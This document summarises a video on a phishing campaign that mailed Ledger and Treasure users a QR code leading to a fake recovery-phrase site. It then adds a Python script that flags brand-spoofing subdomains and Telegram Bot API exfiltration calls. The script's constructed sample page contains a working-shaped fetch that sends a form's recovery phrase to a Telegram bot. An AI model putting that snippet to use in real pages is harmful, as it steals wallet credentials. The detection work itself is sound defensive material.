
Cryptocurrency Phishing Scam Targets Treasure and Ledger Users via Physical Mail
🎬 The video exposes a cryptocurrency phishing scam targeting users of Treasure and Ledger via physical mail, where attackers sent letters urging recipients to scan a QR code for an "authentication check" by February 15th. The QR code directed victims to a fake website (Treasure.authentication-check.io) that prompted them to enter their wallet recovery phrase, which would grant attackers full access to drain funds. The scam leveraged urgency and fake legitimacy, including a forged signature from Ledger's CEO, though the website was already taken down by the time of analysis.

Researchers discovered the phishing site exfiltrated stolen recovery phrases directly to a Telegram bot API, exposing the bot token and chat metadata, including a username ("Flexi6T") linked to the campaign. A separate breach forum post from January 5th advertised a database of 100,000+ Ledger customers, including physical addresses, suggesting how attackers obtained targets for the mail campaign.

The video highlights how the Telegram bot's admin privileges allowed researchers to disrupt the operation by revoking access, though the campaign's scale and victim count remained unclear. Additional scams used similar subdomain spoofing tactics (e.g., Ledger.[malicious-domain]) to mimic legitimate services.
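The two indicators the analysis turned on, a brand name placed in the subdomain of an unrelated registrable domain and a Telegram Bot API call embedded in the phishing page, can be checked mechanically during triage. The script below is an added example written for this summary, not code from the video; the page source it scans is a constructed stand-in for the kit, and it treats the last two host labels as the registrable domain (a public-suffix list would be needed for multi-label suffixes).

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Brand names the campaign spoofed by placing them in a subdomain (from the write-up).
BRANDS = ("ledger", "treasure")

def brand_as_subdomain(url: str) -> Optional[str]:
    """Return the brand name if it appears only in the subdomain, not in the registrable domain.

    Assumption: the registrable domain is the last two labels (no public-suffix handling).
    """
    host = (urlparse(url).hostname or "").lower()
    labels = host.split(".")
    if len(labels) < 3:
        return None  # nothing in front of the registrable domain to spoof with
    registrable = ".".join(labels[-2:])
    subdomain = ".".join(labels[:-2])
    for brand in BRANDS:
        if brand in subdomain and brand not in registrable:
            return brand
    return None

# Shape of the Bot API call the kit used: api.telegram.org/bot<numeric id>:<secret>/<method>
_BOT_CALL = re.compile(r"api\.telegram\.org/bot(\d+):[\w-]+/(\w+)")
_CHAT_ID = re.compile(r"chat_id[\"']?\s*[:=]\s*[\"']?(-?\d+)")

def find_telegram_exfil(page_source: str) -> List[Dict[str, Optional[str]]]:
    """List Telegram Bot API endpoints found in captured page source.

    Only the numeric bot id is reported; the secret half of the token is dropped.
    chat_id values are paired with calls positionally (assumption: one chat_id per call).
    """
    chat_ids = _CHAT_ID.findall(page_source)
    hits = []
    for i, (bot_id, method) in enumerate(_BOT_CALL.findall(page_source)):
        hits.append({"bot_id": bot_id, "method": method,
                     "chat_id": chat_ids[i] if i < len(chat_ids) else None})
    return hits

# Constructed stand-in for the phishing page: a recovery-phrase form plus the exfil call.
SAMPLE_PAGE = """
<form id="recovery"><textarea name="phrase"></textarea></form>
<script>
  fetch("https://api.telegram.org/bot1234567890:AAFakeTokenFakeTokenFakeTokenFake/sendMessage", {
    method: "POST",
    body: JSON.stringify({chat_id: -1009876543210, text: document.forms.recovery.phrase.value})
  });
</script>
"""

if __name__ == "__main__":
    print(brand_as_subdomain("https://Treasure.authentication-check.io/verify"))  # treasure
    print(find_telegram_exfil(SAMPLE_PAGE))
```

With the bot id and chat id in hand, a responder can report the bot to Telegram and correlate other kits that post to the same chat.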